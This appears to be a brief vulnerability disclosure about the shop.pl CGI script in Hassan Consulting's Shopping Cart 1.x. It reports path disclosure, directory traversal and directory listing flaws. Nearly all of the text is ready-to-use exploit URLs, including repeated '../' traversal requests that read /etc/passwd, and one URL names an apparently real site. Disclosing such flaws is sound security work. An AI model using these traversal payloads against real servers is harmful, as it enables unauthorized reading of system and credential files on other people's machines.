Hassan Consulting's Shopping Cart Version 1.x 
shopping cart issues. Simple Path disclosure, directory transversal with file read ability, and listing of files in all directorys in somecases.
Just depends on version of the code. 

VENDOR of SHOP.pl --^ Multiple holes at various patchlevels
<d0tslash> http://www.irata.com/cgi-local/shop2.pl/page=.*

http://www.xxxxxxxxxxx.com/cgi-local/shop.pl/page=../../../../../../../../../../../../../../etc/passwd

http://www.xxxxxxxxx/cgi-local/shop.pl/SID=947574241.3380378/page=../

http://www.xxxxxxxx.com/cgi-bin/shop.pl/page=../../../../../../../../etc/passwd

http://www.xxxxxxxx.com/cgi-local/shop.pl/page=./produck_list

http://www.xxxxxxxx.com/cgi-local/shop.pl/page=